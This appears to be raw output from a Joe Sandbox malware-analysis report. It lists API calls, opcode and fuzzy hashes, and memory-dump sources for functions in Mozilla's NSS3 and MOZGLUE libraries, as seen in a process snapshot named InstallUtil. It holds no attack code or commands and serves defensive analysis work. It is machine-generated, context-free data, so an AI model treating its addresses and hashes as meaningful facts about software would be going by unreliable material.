                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1628394932-0
                                                                                                                  • Opcode ID: d95967200f50e4019f495dbd734c9bd73200755a8c9c3b75968d863369b97fb7
                                                                                                                  • Instruction ID: 2e8ff652c9b0d5b09551221fd9a7f9e1c24617f1d79188823302fee3fa329e4b
                                                                                                                  • Opcode Fuzzy Hash: d95967200f50e4019f495dbd734c9bd73200755a8c9c3b75968d863369b97fb7
                                                                                                                  • Instruction Fuzzy Hash: 721167B06046459BDB00AFB8C18856EBBF4BF02248F01453CD898DB701EB31D499CBD2
                                                                                                                  APIs
                                                                                                                  • calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7587ED,00000800,6C74EF74,00000000), ref: 6C7B1000
                                                                                                                  • PR_NewLock.NSS3(?,00000800,6C74EF74,00000000), ref: 6C7B1016
                                                                                                                    • Part of subcall function 6C8198D0: calloc.MOZGLUE(00000001,00000084,6C740936,00000001,?,6C74102C), ref: 6C8198E5
                                                                                                                  • PL_InitArenaPool.NSS3(00000000,security,6C7587ED,00000008,?,00000800,6C74EF74,00000000), ref: 6C7B102B
                                                                                                                  • TlsGetValue.KERNEL32(00000000,?,?,6C7587ED,00000800,6C74EF74,00000000), ref: 6C7B1044
                                                                                                                  • free.MOZGLUE(00000000,?,00000800,6C74EF74,00000000), ref: 6C7B1064
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: calloc$ArenaInitLockPoolValuefree
                                                                                                                  • String ID: security
                                                                                                                  • API String ID: 3379159031-3315324353
                                                                                                                  • Opcode ID: 016384d154fe138f2beeffc98db3b1d58218abeda1298723e80b8e402bfdf5b5
                                                                                                                  • Instruction ID: 3356bfd009f1cde68b338c229435d6a7815010611107f39ffce956e9c45b79e0
                                                                                                                  • Opcode Fuzzy Hash: 016384d154fe138f2beeffc98db3b1d58218abeda1298723e80b8e402bfdf5b5
                                                                                                                  • Instruction Fuzzy Hash: 5D014471A002509BE7302F3DAE08B5A3AB8BF17788F010535E808E7E52EB71C214DBD2
                                                                                                                  APIs
                                                                                                                  • DeleteCriticalSection.KERNEL32(6C7CC89B,FFFFFE80,?,6C7CC89B), ref: 6C7E058B
                                                                                                                  • free.MOZGLUE(?,?,6C7CC89B), ref: 6C7E0592
                                                                                                                  • PR_SetError.NSS3(FFFFE09A,00000000,FFFFFE80,?,6C7CC89B), ref: 6C7E05AE
                                                                                                                  • PR_SetError.NSS3(FFFFE09A,00000000,FFFFFE80,?,6C7CC89B), ref: 6C7E05C2
                                                                                                                  • DeleteCriticalSection.KERNEL32(6C7CC89B,?,6C7CC89B), ref: 6C7E05D8
                                                                                                                  • free.MOZGLUE(?,?,6C7CC89B), ref: 6C7E05DF
                                                                                                                  • PR_SetError.NSS3(FFFFE09A,00000000,?,6C7CC89B), ref: 6C7E05FB
                                                                                                                    • Part of subcall function 6C7FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7FC2BF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Error$CriticalDeleteSectionfree$Value
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1757055810-0
                                                                                                                  • Opcode ID: f419719aaa8e4e6f76510ed4c2867302494429ce2949608c347fbb7c271e717c
                                                                                                                  • Instruction ID: 7929649fe59c382153626999292cd000c37016c7617a3dfae2a2ae7f7485183f
                                                                                                                  • Opcode Fuzzy Hash: f419719aaa8e4e6f76510ed4c2867302494429ce2949608c347fbb7c271e717c
                                                                                                                  • Instruction Fuzzy Hash: C601FCB2F055609BEE30AFE49D0DF4D3B78A70A31DF040030E50656B41DB69A119C7D9
                                                                                                                  APIs
                                                                                                                  • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C7F3046
                                                                                                                    • Part of subcall function 6C7DEE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7DEE85
                                                                                                                  • PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C7C7FFB), ref: 6C7F312A
                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C7F3154
                                                                                                                  • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C7F2E8B
                                                                                                                    • Part of subcall function 6C7FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7FC2BF
                                                                                                                    • Part of subcall function 6C7DF110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C7C9BFF,?,00000000,00000000), ref: 6C7DF134
                                                                                                                  • memcpy.VCRUNTIME140(8B3C75C0,?,6C7C7FFA), ref: 6C7F2EA4
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7F317B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Error$memcpy$K11_Value
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2334702667-0
                                                                                                                  • Opcode ID: a8c21954caca24bfcf140a78b34b5add1d12dca719b0de398ee07f33dc422a18
                                                                                                                  • Instruction ID: 6a30544ff9355d3b82bdfe0390105716dcc40c1e21dfb29e51b5caf7d8a426fd
                                                                                                                  • Opcode Fuzzy Hash: a8c21954caca24bfcf140a78b34b5add1d12dca719b0de398ee07f33dc422a18
                                                                                                                  • Instruction Fuzzy Hash: E2A1CE71A002189FDB24CF54CD84BEAB7B5EF49308F0480A9ED596B741E731AE46CF92
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 646df92953553762ac53b891ad914091a1e674d455b5404cd66c5ebf4ab80ea0
                                                                                                                  • Instruction ID: 858b83cbcde75391630b729214d4853aa2e964cec52fdfa72db55d6b69b16d48
                                                                                                                  • Opcode Fuzzy Hash: 646df92953553762ac53b891ad914091a1e674d455b5404cd66c5ebf4ab80ea0
                                                                                                                  • Instruction Fuzzy Hash: 55917130D081584FCB258E998A917DEB7B5AF4A32CF1483F9C5999BA01D6318E87CFD1
                                                                                                                  APIs
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C7BED6B
                                                                                                                  • PORT_Alloc_Util.NSS3(00000000), ref: 6C7BEDCE
                                                                                                                    • Part of subcall function 6C7B0BE0: malloc.MOZGLUE(6C7A8D2D,?,00000000,?), ref: 6C7B0BF8
                                                                                                                    • Part of subcall function 6C7B0BE0: TlsGetValue.KERNEL32(6C7A8D2D,?,00000000,?), ref: 6C7B0C15
                                                                                                                  • free.MOZGLUE(00000000,?,?,?,?,6C7BB04F), ref: 6C7BEE46
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C7BEECA
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C7BEEEA
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C7BEEFB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3768380896-0
                                                                                                                  • Opcode ID: 2e66947b5033f199d53de4bcaf0aa2514003f92588b587c0d8de1040128ce8c9
                                                                                                                  • Instruction ID: fed4f8474542dd064b9741312573bbb488397a7bf4714780dab1efef348f0afd
                                                                                                                  • Opcode Fuzzy Hash: 2e66947b5033f199d53de4bcaf0aa2514003f92588b587c0d8de1040128ce8c9
                                                                                                                  • Instruction Fuzzy Hash: B7816BB5A002099FEB14CF59DA85BAB77F9BF88308F144478E815AB751DB30E814CBA1
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6C7BC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C7BDAE2,?), ref: 6C7BC6C2
                                                                                                                  • PR_Now.NSS3 ref: 6C7BCD35
                                                                                                                    • Part of subcall function 6C819DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C860A27), ref: 6C819DC6
                                                                                                                    • Part of subcall function 6C819DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C860A27), ref: 6C819DD1
                                                                                                                    • Part of subcall function 6C819DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C819DED
                                                                                                                    • Part of subcall function 6C7A6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C751C6F,00000000,00000004,?,?), ref: 6C7A6C3F
                                                                                                                  • PR_GetCurrentThread.NSS3 ref: 6C7BCD54
                                                                                                                    • Part of subcall function 6C819BF0: TlsGetValue.KERNEL32(?,?,?,6C860A75), ref: 6C819C07
                                                                                                                    • Part of subcall function 6C7A7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C751CCC,00000000,00000000,?,?), ref: 6C7A729F
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C7BCD9B
                                                                                                                  • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C7BCE0B
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C7BCE2C
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B10F3
                                                                                                                    • Part of subcall function 6C7B10C0: EnterCriticalSection.KERNEL32(?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B110C
                                                                                                                    • Part of subcall function 6C7B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1141
                                                                                                                    • Part of subcall function 6C7B10C0: PR_Unlock.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1182
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B119C
                                                                                                                  • PORT_ArenaMark_Util.NSS3(00000000), ref: 6C7BCE40
                                                                                                                    • Part of subcall function 6C7B14C0: TlsGetValue.KERNEL32 ref: 6C7B14E0
                                                                                                                    • Part of subcall function 6C7B14C0: EnterCriticalSection.KERNEL32 ref: 6C7B14F5
                                                                                                                    • Part of subcall function 6C7B14C0: PR_Unlock.NSS3 ref: 6C7B150D
                                                                                                                    • Part of subcall function 6C7BCEE0: PORT_ArenaMark_Util.NSS3(?,6C7BCD93,?), ref: 6C7BCEEE
                                                                                                                    • Part of subcall function 6C7BCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C7BCD93,?), ref: 6C7BCEFC
                                                                                                                    • Part of subcall function 6C7BCEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C7BCD93,?), ref: 6C7BCF0B
                                                                                                                    • Part of subcall function 6C7BCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C7BCD93,?), ref: 6C7BCF1D
                                                                                                                    • Part of subcall function 6C7BCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C7BCD93,?), ref: 6C7BCF47
                                                                                                                    • Part of subcall function 6C7BCEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C7BCD93,?), ref: 6C7BCF67
                                                                                                                    • Part of subcall function 6C7BCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C7BCD93,?,?,?,?,?,?,?,?,?,?,?,6C7BCD93,?), ref: 6C7BCF78
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3748922049-0
                                                                                                                  • Opcode ID: 70bef20ec1b47ebd271e90f54404b4576c055748dc4f8e0739632adf89d90216
                                                                                                                  • Instruction ID: 6717b81eeca627a9c991900dbb952b430db25aea0219f8ffedaff12a843b3da8
                                                                                                                  • Opcode Fuzzy Hash: 70bef20ec1b47ebd271e90f54404b4576c055748dc4f8e0739632adf89d90216
                                                                                                                  • Instruction Fuzzy Hash: ED51B3B6A001019BE710DF69DE45BAA73E8EF48349F258534E855B7B40EB31E905CB91
                                                                                                                  APIs
                                                                                                                  • PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C78EF38
                                                                                                                    • Part of subcall function 6C779520: PK11_IsLoggedIn.NSS3(00000000,?,6C7A379E,?,00000001,?), ref: 6C779542
                                                                                                                  • PK11_Authenticate.NSS3(?,00000001,?), ref: 6C78EF53
                                                                                                                    • Part of subcall function 6C794C20: TlsGetValue.KERNEL32 ref: 6C794C4C
                                                                                                                    • Part of subcall function 6C794C20: EnterCriticalSection.KERNEL32(?), ref: 6C794C60
                                                                                                                    • Part of subcall function 6C794C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C794CA1
                                                                                                                    • Part of subcall function 6C794C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C794CBE
                                                                                                                    • Part of subcall function 6C794C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C794CD2
                                                                                                                    • Part of subcall function 6C794C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C794D3A
                                                                                                                  • PR_GetCurrentThread.NSS3 ref: 6C78EF9E
                                                                                                                    • Part of subcall function 6C819BF0: TlsGetValue.KERNEL32(?,?,?,6C860A75), ref: 6C819C07
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C78EFC3
                                                                                                                  • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C78F016
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C78F022
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2459274275-0
                                                                                                                  • Opcode ID: 4d11098a5dfaf0a36d50d62931eecb67b6038df234073504aed05a5df221d1e0
                                                                                                                  • Instruction ID: 31307c8dfc03d42d246cfd6a75f1703efa9fdcfb00a3c55a32b72795c44b7b52
                                                                                                                  • Opcode Fuzzy Hash: 4d11098a5dfaf0a36d50d62931eecb67b6038df234073504aed05a5df221d1e0
                                                                                                                  • Instruction Fuzzy Hash: EF41A2B1E0110AAFDF018FA9DD48BEE7BB9AF48358F104035FA14A6350E771C915CBA1
                                                                                                                  APIs
                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C764894
                                                                                                                    • Part of subcall function 6C7AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8818D0,?), ref: 6C7AB095
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7648CA
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7648DD
                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?), ref: 6C7648FF
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C764912
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C76494A
                                                                                                                    • Part of subcall function 6C7FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7FC2BF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$AlgorithmTag_$DecodeErrorItem_Quick$Value
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 759476665-0
                                                                                                                  • Opcode ID: 37c5658139759f8869387dda5cacbb8bd62c6abaff5db374d52f550ae067d55d
                                                                                                                  • Instruction ID: 4637a5bed919dd3ac307a4cfec18828fb7b19087dbe22913172a12020bd03982
                                                                                                                  • Opcode Fuzzy Hash: 37c5658139759f8869387dda5cacbb8bd62c6abaff5db374d52f550ae067d55d
                                                                                                                  • Instruction Fuzzy Hash: 2A41C3716043065BE704CA6BDA94BAB77E89B44318F04053CEE5597F41F770E908D752
                                                                                                                  APIs
                                                                                                                  • PORT_Alloc_Util.NSS3(00000060), ref: 6C77CF80
                                                                                                                  • SECITEM_DupItem_Util.NSS3(?), ref: 6C77D002
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6C77D016
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C77D025
                                                                                                                  • PR_NewLock.NSS3 ref: 6C77D043
                                                                                                                  • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C77D074
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3361105336-0
                                                                                                                  • Opcode ID: b9b8e0aafb2d275907417f3fb9d06615fe9f16f6b9d2a65e762898a722a07a41
                                                                                                                  • Instruction ID: 558e11af274bedd3b9ba66a3158cbb4f70f8de13b2af6d0bbac691fbd7ef2f10
                                                                                                                  • Opcode Fuzzy Hash: b9b8e0aafb2d275907417f3fb9d06615fe9f16f6b9d2a65e762898a722a07a41
                                                                                                                  • Instruction Fuzzy Hash: 3841D2B0A012098FDF20DF29CA8839A7BE4EF18319F105179DC188BB46D770C885CBB5
                                                                                                                  APIs
                                                                                                                  • PORT_Alloc_Util.NSS3(-00000007), ref: 6C76660F
                                                                                                                    • Part of subcall function 6C7B0BE0: malloc.MOZGLUE(6C7A8D2D,?,00000000,?), ref: 6C7B0BF8
                                                                                                                    • Part of subcall function 6C7B0BE0: TlsGetValue.KERNEL32(6C7A8D2D,?,00000000,?), ref: 6C7B0C15
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C766660
                                                                                                                  • PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C76667B
                                                                                                                  • SGN_DecodeDigestInfo.NSS3(?), ref: 6C76669B
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(-00000004), ref: 6C7666B0
                                                                                                                  • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C7666C8
                                                                                                                    • Part of subcall function 6C7925D0: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C76662E,?,?), ref: 6C792670
                                                                                                                    • Part of subcall function 6C7925D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C76662E,?), ref: 6C792684
                                                                                                                    • Part of subcall function 6C7925D0: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C7926C2
                                                                                                                    • Part of subcall function 6C7925D0: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,?), ref: 6C7926E0
                                                                                                                    • Part of subcall function 6C7925D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C7926F4
                                                                                                                    • Part of subcall function 6C7925D0: PR_Unlock.NSS3(?), ref: 6C79274D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: UtilValue$CriticalEnterSectionUnlock$AlgorithmAlloc_Arena_DecodeDigestErrorFreeInfoTag_freemalloc
                                                                                                                  • String ID:
